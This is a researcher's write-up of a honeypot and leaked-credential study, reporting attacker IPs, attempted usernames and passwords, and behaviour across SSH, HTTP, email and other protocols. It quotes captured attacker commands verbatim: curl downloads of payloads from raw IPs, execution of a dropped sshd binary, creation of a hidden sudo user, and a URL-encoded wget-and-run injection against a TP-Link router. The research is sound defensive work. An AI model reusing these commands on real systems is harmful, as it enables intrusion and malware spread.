Simple Google dorking reveals tens of thousands of leaked credentials: service logins, machine logins, email addresses, social media accounts, software license keys and pretty much anything else that can grant an identity. Even though Google tries to avoid indexing this data and masks sensitive information, thousands of such pages can still be found across paste sites and forums, and the number grows significantly with non-mainstream search engines. A sizable share of social media traffic, and a large share of general internet traffic, is generated by bots and botnets that need some sort of identity to operate on these platforms and that tend to take over accounts to continue their campaigns. It is therefore crucial to understand how these automated entities propagate across applications and protocols.

This is where the concept of a honeypot comes in. The general idea is to intentionally leak part or all of a credential for some service, then observe how and where it is picked up and what is done with it. Beyond credentials, honeypots are also used to study the tooling that bad actors and automated entities use for scanning, payload generation and payload delivery, and to observe their interaction and behaviour.
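
To trace "how and where" a leaked credential is picked up, each leak location needs its own unique credential. The snippet below is a minimal sketch of that bookkeeping, not the setup used for this article: the `svc-` naming scheme, the function names and the `paste-site-A` label are all hypothetical.

```python
import secrets

def make_canary(leak_site, registry):
    """Create a unique throwaway credential for one leak location.

    `registry` maps (username, password) -> leak_site so that a later
    login attempt can be traced back to where the pair was posted.
    """
    username = "svc-" + secrets.token_hex(4)   # hypothetical naming scheme
    password = secrets.token_urlsafe(12)       # random, so it cannot be guessed
    registry[(username, password)] = leak_site
    return username, password

def trace_login(username, password, registry):
    """Return the leak site for a planted credential, or None if never planted."""
    return registry.get((username, password))

registry = {}
user, pw = make_canary("paste-site-A", registry)
print(trace_login(user, pw, registry))          # the site this pair was leaked on
print(trace_login("root", "123456", registry))  # None: an ordinary brute-force guess
```

Because the password is random, a login with a planted pair almost certainly came from someone who read the leak, which separates scraped-credential use from ordinary dictionary attacks.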

Server overview

After initially testing several honeypot packages on my local systems and experimenting with port forwarding and containers, I realized that servers in multiple geographies would naturally attract more traffic. I spun up ~12 servers across multiple countries, with specs varying according to the services they were running. Most of the tools I used are listed in the awesome-honeypots project.

SSH

(remote access)

By far the most commonly probed protocol: TCP/22 was being enumerated within minutes of the server coming up.

Within the first 48 hours alone:

Distribution of IP addresses (top 10):

23.153.232.26
185.224.128.34
157.230.80.76
122.171.18.122
171.221.205.30
122.171.19.21
115.241.74.34
121.143.130.12
59.4.213.254
220.82.240.49
... 153 more rows

Count of unique IP addresses:

Count of unauthorized login events:

grep "unauthorized login" *.log | wc -l showed 15643 events.

Distribution of SSH client software:

grep "Remote SSH version" *.log | cut -d ' ' -f 6 | sort | uniq -c | sort -nr

SSH-2.0-Go
SSH-2.0-OpenSSH_6.0p1
SSH-2.0-ZGrab
SSH-2.0-libssh2_1.10.0
SSH-2.0-OpenSSH_8.9p1
SSH-2.0-OpenSSH_9.0
SSH-2.0-OpenSSH_7.9p1
SSH-2.0-libssh_0.7.4
SSH-2.0-OpenSSH_8.4p1
SSH-2.0-makiko
SSH-2.0-libssh2_1.9.0
SSH-2.0-OpenSSH_7.4
SSH-2.0-paramiko_2.11.0
GET
SSH-2.0-OpenSSH_9.3
MGLNDD_3.111.217.202_22
MGLNDD_3.111.187.169_22
MGLNDD_18.223.119.164_22
MGLNDD_13.127.128.240_22
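
The same tally can be reproduced without the shell pipeline. The sketch below mirrors `cut -d ' ' -f 6 | sort | uniq -c | sort -nr` in Python; the sample log lines are hypothetical (timestamps and the 192.0.2.x addresses are placeholders) and only assume that the banner is the sixth space-separated field, as the `cut` call above implies.

```python
from collections import Counter

def ssh_client_distribution(lines):
    """Count SSH client banners, most common first."""
    counts = Counter()
    for line in lines:
        if "Remote SSH version" not in line:
            continue
        fields = line.rstrip("\n").split(" ")  # same splitting as cut -d ' '
        if len(fields) >= 6:
            counts[fields[5]] += 1             # field 6 (1-indexed), as in cut -f 6
    return counts.most_common()

# Hypothetical lines, shaped so that the banner lands in field 6.
sample_lines = [
    "2023-01-01T00:00:01Z [HoneyPotSSHTransport,0,192.0.2.10] Remote SSH version: SSH-2.0-Go",
    "2023-01-01T00:00:02Z [HoneyPotSSHTransport,1,192.0.2.11] Remote SSH version: SSH-2.0-ZGrab",
    "2023-01-01T00:00:03Z [HoneyPotSSHTransport,2,192.0.2.12] Remote SSH version: SSH-2.0-Go",
    "2023-01-01T00:00:04Z [HoneyPotSSHTransport,2,192.0.2.12] login attempt failed",
]

for banner, count in ssh_client_distribution(sample_lines):
    print(count, banner)
```

Entries such as `GET` and `MGLNDD_...` in the list above are simply whatever a client sent first in place of a valid SSH banner, so they end up in the same field.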

Distribution of usernames attempted:

root
admin
pi
ubnt
sudev
usr
super
default
ubuntu
support
Admin
ftp
telnet
zyfwp
vadmin
sFTPUser
root1
hikvision
ec2-user
user
oracle
adtecftp
www
web
posiflex
ont
vagrant
test
remotessh
postgres
os
jenkins
hello
git
fliruser
esuser
es
aws
ansible
adtec
1234
useradmin
john
guest
fedora
devops
butter
anonymous
administrator
123456

Count of unique passwords attempted:

Distribution of passwords attempted (top 20):

123456
38
root
admin
1234
password
0
raspberry
12345
test123
Admin123
Admin
asdf
admin1234
123
inflection
admin123!@#
root123
admin123456
111111

A few of the commands that were run:

Clearly, someone is trying to run an executable. Very commonly spammed:

CMD: ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;

In another case, some connections triggered an SFTP write of a malicious/patched sshd executable:

dispatching: INIT requestId=3
dispatching: MKDIR requestId=1
SFTP makeDirectory: b'./.6260608818804882209'
dispatching: OPEN requestId=2
SFTP openFile: b'./.6260608818804882209/sshd'
dispatching: WRITE requestId=3
adding 65708 to 65364 in channel 0
dispatching: WRITE requestId=4
dispatching: WRITE requestId=5
 ...
dispatching: WRITE requestId=735
...
SFTP Uploaded file "sshd" to ./downloads/c589ea48755c88a02e6b15df979f85006d5572c47888740877630c53779750c6

followed by a logout and login:

avatar root logging out
b'root' authenticated with b'password'

followed by:

CMD: echo 1 && cat /bin/echo
CMD: nohup $SHELL -c "curl http://168.119.173.48:60142/linux -o /tmp/ABO2MG1QGA; if [ ! -f /tmp/ABO2MG1QG
CMD: head -c 2344348 > /tmp/DEsmkDf8HO
Received unhandled keyID: b'\x00'
Received unhandled keyID: b'\x00'
Received unhandled keyID: b'\x00'
...
<logout>

In some cases, after the patched sshd executable was written, the following was executed:

chmod +x ./.8278773721751228781/sshd;nohup ./.8278773721751228781/sshd 191.252.204.41 5.42.73.122 162.240.149.176 202.133.88.34 111.74.23.213 112.4.238.226 89.116.73.228 117.250.10.204 122.228.207.106 37.60.225.36 107.172.84.105 60.13.37.55 193.203.161.58 159.203.68.250 117.161.233.102 164.92.166.153 95.164.33.119 116.103.228.45 222.77.96.7 18.139.171.248 143.198.110.204 222.186.3.91 107.174.250.150 61.185.15.118 125.122.27.208 193.169.244.205 77.91.78.243 125.220.195.10 18.61.211.205 202.5.16.82 37.58.18.181 92.246.91.100 62.72.1.151 59.38.100.77 125.124.179.148 37.58.18.246 88.218.249.242 221.181.168.32 222.77.96.50 120.71.183.216 125.124.199.57 143.178.159.78 216.181.107.48 114.236.138.231 158.51.96.38 131.153.225.186 80.151.78.147 51.79.230.233 192.227.148.214 221.229.107.155 61.164.145.11 &

nohup <the list above>

It is interesting that a lot of these agents do not try to take over the account entirely. They opportunistically use the credentials to propagate malware.
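
The address list passed to the dropped sshd binary is a ready-made set of indicators. Below is a minimal sketch for pulling IPv4 addresses out of a captured command line; the function name is hypothetical, and the sample command is a shortened copy of the one above with only the first three addresses.

```python
import ipaddress
import re

# Candidate dotted quads; validation is left to the ipaddress module.
IPV4_CANDIDATE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def extract_ipv4(command):
    """Return the valid IPv4 addresses in `command`, in order, without duplicates."""
    found = []
    for candidate in IPV4_CANDIDATE.findall(command):
        try:
            ipaddress.IPv4Address(candidate)   # rejects e.g. 999.1.1.1
        except ValueError:
            continue
        if candidate not in found:
            found.append(candidate)
    return found

command = ("chmod +x ./.8278773721751228781/sshd;nohup ./.8278773721751228781/sshd "
           "191.252.204.41 5.42.73.122 162.240.149.176 &")
print(extract_ipv4(command))
```

The hidden directory name contains digits but no dotted quad, so it is not mistaken for an address.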

Some other commands included:

/ip cloud print

ifconfig

uname -a

cat /proc/cpuinfo

ps -ef

ps | grep '[Mm

who

uptime

echo -e "\x6F\x6B"

ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

nohup $SHELL -c "curl http://43.132.150.184:60134/linux -o /tmp/AhjLPQOFR9; if [ ! -f /tmp/AhjLPQOFR9'

apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 9rDYBD6Z) system && sudo usermod -aG sudo system

openssl passwd -1 9rDYBD6Z

sudo useradd -m -p  system

sudo usermod -aG sudo system

Clearly, there is a large repository of persistence, privilege-escalation and system-recon methods to learn from here. Just a reminder: the data above is from only the first 48 hours.
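
Some of these commands are easier to read once decoded. As a small worked example, the `echo -e "\x6F\x6B"` seen above prints a two-character string; the sketch below decodes the `\xNN` escapes the way `echo -e` would. Reading it as a check that the shell really executes commands is my interpretation, not something the logs state.

```python
import re

def decode_hex_escapes(text):
    """Replace each \\xNN escape with the character it denotes."""
    return re.sub(
        r"\\x([0-9A-Fa-f]{2})",
        lambda match: chr(int(match.group(1), 16)),
        text,
    )

print(decode_hex_escapes(r"\x6F\x6B"))  # prints "ok"
```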

FTP

(file server)

Within the first 48 hours alone:

Surprisingly, not a lot of activity here.

Distribution of IP addresses:

'64.62.197.105'
'205.210.31.194'
'198.235.24.16'
'198.235.24.143'
'198.235.24.142'
'192.241.222.77'
'107.170.224.58'
'87.236.176.185'
'87.236.176.181'
'205.210.31.149'
'198.235.24.248'
'104.152.52.129'

Distribution of commands issued:

'AUTH'
'USER'
'SYST'
'PASS'
'TYPE'
'LIST'
'QUIT'
'\x03  *%À     COOKIE

There were 2 LIST operations performed, both with the argument home/ftp/db.txt.

Telnet

(remote access)

Within the first 24 hours alone:

Distribution of IP addresses (top 10):

"117.235.230.152"
"85.204.215.57"
"36.111.149.84"
"123.154.252.138"
"222.189.105.241"
"95.189.48.180"
"92.46.224.46"
"92.15.182.194"
"91.92.252.209"
"89.248.162.159"

Distribution of usernames attempted (top 10):

"root"
"admin"
"guest"
"supervisor"
"user"
"888888"
"ubnt"
"tech"
"support"
"service"

Distribution of passwords attempted (top 20):

"12345"
"password"
"admin"
"1234"
"user"
"aquario"
"888888"
"54321"
"1234567890"
""
"pass"
"Win1doW$"
"7ujMko0admin"
"666666"
"5up"
"123456"
"zsun1188"
"zhongxing"
"xmhdipc"
"ttnet"

HTTP and HTTPS

(web server)

Within the first 24 hours alone:

Distribution of request type:

"GET"
"POST"
"HEAD"

Distribution of request URIs:

"/"
"/.env"
"/Core/Skin/Login.aspx"
"/favicon.ico"
"/test"
"/robots.txt"
"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)"
"example.com:80"
"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"/upl.php"
"/systembc/password.php"
"/sitemap.xml"
"/password.php"
"/info.php"
"/geoip/"
"/form.html"
"/files/"
"/bundle.js"
"/1.php"
"/.well-known/security.txt"
"/.git/config"
"/sugar_version.json"

... and many, many more.

The request to the particularly interesting URI

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)

had the user agent: Root Sl*t(censored).
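
URL-decoding the `country` parameter makes the injected shell command readable. The sketch below uses only the standard library; the helper name is hypothetical, and treating `+` as a space follows the usual query-string convention, which is an assumption about how the target device parses the request.

```python
from urllib.parse import parse_qs, urlsplit

uri = (
    "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+"
    "%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+"
    "shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)"
)

def injected_parameter(request_uri, name):
    """Return the decoded value of query parameter `name`, or None if absent."""
    query = urlsplit(request_uri).query
    values = parse_qs(query).get(name, [])
    return values[0] if values else None

print(injected_parameter(uri, "country"))
# prints: $(cd /tmp; rm -rf shk; wget http://103.163.214.97/shk; chmod 777 shk; ./shk tplink; rm -rf shk)
```

Decoded, the payload is a download-and-execute chain: change to /tmp, fetch a binary named shk, make it executable, run it with the argument tplink, then delete it.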

Email

I looked through a lot of methodology for recon, propagation and persistence and found that, because mainstream providers (e.g. Google) enforce practices such as mandatory recovery setup and activity notifications, ‘disposable’ and non-mainstream providers are of significant interest to entities looking for addresses. I created many, many accounts across providers, started leaking them across paste sites, forums and social media, and was surprised by the near-instant brute-force login attempts.

After reading multiple reports on malware and humans that covertly use leaked credentials, I found that many intend to use a credential for as long as possible without raising any alarms, i.e. they simply start using the account without taking it over (which would naturally force the owner to reset it). A similar pattern can be seen with the SSH honeypot earlier in the article: after login, there is an immediate attempt to install and execute malware rather than to change the key and fully own the user. This opportunistic approach makes sense, since most of these accounts are ‘disposable’ or ‘use-and-abandon’ and are not most people’s main identity; from a bad actor’s point of view, immediate use is worth more than the risk and effort of a reset. The rate at which users actually check these accounts is quite low, and the rate of abandonment (as long as there is no ‘reset notification’) is quite high. And so I started leaking the password along with the email address, to see the email equivalent of the SSH ‘commands executed’.

Many accounts were taken over (the password was changed and I lost access). However, on the accounts that were logged into without a password change, a large number of sign-ups to social media, chat sites, pastebins and interaction services occurred. Some accounts started sending out phishing, spam and advertisement email. Some started exchanging email addresses, IP addresses and social media handles with other email addresses, pastebin links and anonymous note URLs, possibly bots/botmasters or human operators collecting and sharing details to further escalate interaction. I wanted to see what actually happens on those social media accounts, but my attempts to log into them from my own device resulted in the platform blocking the account, likely due to spam detection (logins from different IPs, scraping, rapid interactions etc.), even across multiple networks (home, proxy, etc.). The timing of the messages was sporadic, and the number of social media handles and email addresses sent per file varied. Some usernames obviously indicated humans and were mostly used for free software trials, website sign-ups and social media applications; many others seemed to follow a pattern and were likely part of a botnet.

Note: I visited some of the social media profiles that were being collected and transferred and they seemed to belong to real people. Perhaps these handles and email addresses were farmed through an operator/bot interacting with real people and sent to a botmaster or another operator. I will not be posting any of their usernames or email addresses and have deleted/disposed of the accounts.

LDAP

(directory services)

Within the first 48 hours alone:

Distribution of IP addresses:

"71.174.241.122"
"117.247.23.204"
"8.213.129.112"
"45.83.66.216"
"45.83.64.112"
"45.33.80.243"
"205.210.31.6"
"205.210.31.48"
"205.210.31.3"
"205.210.31.177"
"205.210.31.16"

I ran a low-interaction solution for LDAP and might explore a more sophisticated one in the future.

SMB

(network file shares)

Within the first 24 hours alone:

Distribution of IP addresses (top 10):

"213.6.17.78"
"59.153.18.93"
"182.78.227.58"
"182.239.114.72"
"95.181.128.134"
"191.33.93.162"
"171.224.180.227"
"125.162.237.19"
"103.183.240.2"
"123.25.115.28"

Distribution of workgroup names attempted:

(domainname\\administrator,LOCALPCNAME)"
(WORKGROUP\\Administrator,WIN-48Q9KQD852D)"
(\\for,)"
(\\accounts,)"
(\\사용자,)"
(\\User,)"
(\\\\\\,)"
(\\,)"
\\
(\\계정,)"
.\\
(\\GUEST,)"
(WORKGROUP\\,WINDOWS)"

IPP

(printing over the internet)

I ran a low-interaction honeypot for this protocol and received a few POST /ipp scan requests from CensysInspect/1.1, plus a few requests with the following payload:

VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://54.151.110.227:631/ipp|ATTR requested-attributes all
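
The payload above is the honeypot's pipe-delimited rendering of the request, not the IPP wire format. A minimal sketch for turning such a record into a dictionary follows; the function name and the output layout are hypothetical, and it assumes every field has the `KEY value` or `ATTR name value` shape seen in this one sample.

```python
def parse_ipp_record(record):
    """Split a pipe-delimited IPP log record into header fields and attributes."""
    parsed = {"attributes": {}}
    for part in record.split("|"):
        key, _, rest = part.partition(" ")
        if key == "ATTR":
            name, _, value = rest.partition(" ")
            parsed["attributes"][name] = value
        else:
            parsed[key.lower()] = rest
    return parsed

record = (
    "VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|"
    "GROUP operation-attributes-tag|ATTR attributes-charset utf-8|"
    "ATTR attributes-natural-language en-us|"
    "ATTR printer-uri ipp://54.151.110.227:631/ipp|ATTR requested-attributes all"
)

parsed = parse_ipp_record(record)
print(parsed["operation"], parsed["attributes"]["requested-attributes"])
```

Read this way, the request is a Get-Printer-Attributes operation asking for all attributes, i.e. a full description of the printer.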

MSSQL and MySQL

(database servers)

Within the first 24 hours alone:

Distribution of IP addresses (top 10):

"58.210.84.206"
"223.68.154.158"
"128.65.181.53"
"36.134.98.177"
"121.28.0.62"
"60.1.128.255"
"45.250.231.106"
"45.201.132.128"
"41.205.56.191"
"23.224.97.225"

I also noticed a lot of password spraying with the username sa and 468 passwords. Some examples are below:

"P@$$w0rd"
"Heaven"
"Douglas1"
"Dennis"
"Aa12345678"
"Aa123456"
"ALEX"
"ABCabc123"
"A123456"
"88888888"
"62 35 61 38 61 63 36 66 38 30 35 39 36 34 31 31 33 34 32 32 37 3"
"6105"
"5201314"
"4yqbm4,m`~!@~#$%^&*(),.;"

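One of the sa passwords above, the one made of space-separated two-digit groups, looks like hex-encoded ASCII. The sketch below decodes the complete groups and stops at the final lone `3`, which is cut off in the log and is not guessed at. The function name is hypothetical.

```python
def decode_hex_tokens(raw):
    """Decode space-separated two-digit hex groups into text.

    Stops at the first group that is not exactly two characters long,
    so a truncated trailing group is dropped rather than guessed.
    """
    chars = []
    for token in raw.split():
        if len(token) != 2:
            break
        chars.append(chr(int(token, 16)))
    return "".join(chars)

attempted = "62 35 61 38 61 63 36 66 38 30 35 39 36 34 31 31 33 34 32 32 37 3"
print(decode_hex_tokens(attempted))  # prints "b5a8ac6f8059641134227"
```

The decoded text is itself a string of hexadecimal digits. It could be part of a hash or token, but nothing in the logs confirms that.
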
MySQL had similar characteristics, with the addition of a few interesting usernames:

\x17a-ٸe
TL'W{\x12^
)\x08і
.3K
 J+,

PJL

(printer and host communication protocol)

This was a low-interaction solution; however, a few interesting commands were submitted:

"@PJL INFO ID\r\n\r\n"
"@PJL INFO ID\r\n\r\n"
"@PJL INFO ID\r\n\r\n"
"@PJL INFO STATUS\n@PJL INFO ID\n"
"GET / HTTP/1.1\r\nHost: 13.233.138.158:9100\r\nAccept: */*\r\nConnection: close\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\r\n\r\n"
"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\nHost: 54.151.110.227:9100\r\n\r\n"
"GET / HTTP/1.1\r\nUser-Agent: curl/7.29.0\r\nHost: 13.233.138.158\r\nAccept: */*\r\n\r\n"
"HELPREDIS\r\ninfo\r\n"
"User User\r\n"

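Only some of what arrives on the PJL port is PJL at all. A rough way to quantify that is to classify each payload by its first line, as sketched below. The labels and function name are hypothetical, and the HTTP samples are trimmed to their request line and one header for brevity.

```python
from collections import Counter

def classify_payload(payload):
    """Label a raw payload as 'pjl', 'http' or 'other' from its first line."""
    first_line = payload.split("\n", 1)[0].strip()
    if first_line.startswith("@PJL"):
        return "pjl"
    parts = first_line.split(" ")
    if len(parts) == 3 and parts[2].startswith("HTTP/"):
        return "http"   # looks like "<METHOD> <path> HTTP/<version>"
    return "other"

payloads = [
    "@PJL INFO ID\r\n\r\n",
    "@PJL INFO ID\r\n\r\n",
    "@PJL INFO ID\r\n\r\n",
    "@PJL INFO STATUS\n@PJL INFO ID\n",
    "GET / HTTP/1.1\r\nHost: 13.233.138.158:9100\r\n\r\n",  # headers trimmed
    "GET / HTTP/1.1\r\nHost: 54.151.110.227:9100\r\n\r\n",  # headers trimmed
    "GET / HTTP/1.1\r\nUser-Agent: curl/7.29.0\r\n\r\n",    # headers trimmed
    "HELPREDIS\r\ninfo\r\n",
    "User User\r\n",
]

tally = Counter(classify_payload(p) for p in payloads)
print(tally)
```

On the nine payloads listed above this gives four PJL queries, three HTTP requests and two that fit neither, which suggests that several scanners probe the port with generic requests without regard to the protocol behind it.
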
Elastic

(document indexing and search engine)

A low-interaction solution here as well; however, a few interesting requests were seen:

"GET / HTTP/1.0\r\n"
"GET / HTTP/1.1\r\n"
"GET /?CAVIT HTTP/1.1\r\n"
"GET /_search HTTP/1.1\r\n"
"GET /api HTTP/1.0\r\n"
"GET /hazelcast/rest/cluster HTTP/1.0\r\n"
"GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0\r\n"
"GET /server-info HTTP/1.1\r\n"
"GET /version HTTP/1.1\r\n"

The problem remains

As we can see, the number of bots and humans attempting to gain an identity or an account is massive. The IPv4 space is continuously being port scanned, and web content is continuously being searched and indexed. Countless forums on the general internet give out thousands of credentials and keys of all types, sometimes free, sometimes paid, and some show up on the first page of Google itself. Once again, the number of sites discovered grows significantly with alternative search engines.

I also found multiple open-source, readily available tools that create addresses in bulk while avoiding abuse detection. Many online forums and open-source tools also offer out-of-the-box solutions that use browser automation to trivially bypass limits on fetching and sending email programmatically via API or IMAP/SMTP libraries. This implies that bots and human operators can create addresses in bulk with a relatively low barrier to entry.

With the boundaries between bad actors, bots and genuine users getting blurrier by the day, attacks are becoming more sophisticated and covert. Password breach detection services such as haveibeenpwned are at the forefront of notifying users when an organization is breached; however, we also need systems that scan the IPv4 space and the web to lower the rate of identity compromise and malicious activity and to minimize the time to notification.

What’s next?

Further analysis of bot/human behaviour in credential search

In the shortest case, an SSH login was picked up within 2 minutes of being posted to a paste site. Scrapers or human operators might choose which credentials to try based on how the information is presented. It would be interesting to see how scrapers and humans behave under combinations of the following variables:

one-address leaks
multiple-address leaks
some credentials working
all credentials working
no credentials working
timer on the content

Research on honeypot detection is becoming popular, and will in turn lead to smarter honeypots.

Further analysis of account recovery mechanism vs. takeover

Initially, many accounts were logged into and had their password changed, at which point I lost access, since I had not set any recovery mechanism. With a recovery email set, things got better, but it was still often unset and I lost access again. However, after I set less common recovery methods such as phrases/key-files, relatively fewer takeovers occurred. Since recovery email addresses and phone numbers are the most common methods, they are presented front and center and may directly guide a bad actor’s actions once the account is taken over. For example, a recovery email may be deleted, since the attacker already knows the password and is in the account. Lesser-used mechanisms such as phrases/key-files or device binding, which are presented in different UI sections altogether, seem to do a better job of not being overridden. Users should be made aware of these mechanisms as stronger alternatives.

Can we predict usernames and addresses that bots will use to intercept info or thwart networks?

It would also be of interest to study the patterns in the usernames being used and to try to take up the address space or intercept the process. Bot detection on social media sites is a big problem, and pre-emptively registering or blocking predictable usernames once a bot naming pattern has been established might help. What’s more interesting: given that a lot of modern malware, botnets and human operators use social media for C&C, would creating accounts based on a username pattern lead us to pings/beacons from the ‘real’ bots or the ‘real’ human operators? There is some academic and hobbyist research in this area, but it seems to be in its early stages. A very interesting rabbit hole to go down.

Leak discovery and improved awareness

I have additional research ongoing on content discovery and will be writing that up soon. It would be nice to have a service that monitors email leaks and informs users across multiple mediums. Password breach detection services such as haveibeenpwned are quite popular; however, I have not come across any that scrape the general internet or the IPv4 port space looking for leaks. Informing the user can improve awareness and lower the chance of a successful phishing/spam/scam campaign. I also intend to search alternative networks for this, namely IPFS.

Note: all the opinions presented in this article are purely my own and do not represent any other entity. All the tools and techniques I have described here are for research purposes. Do not attempt to scan or log into an account or service that you do not own.
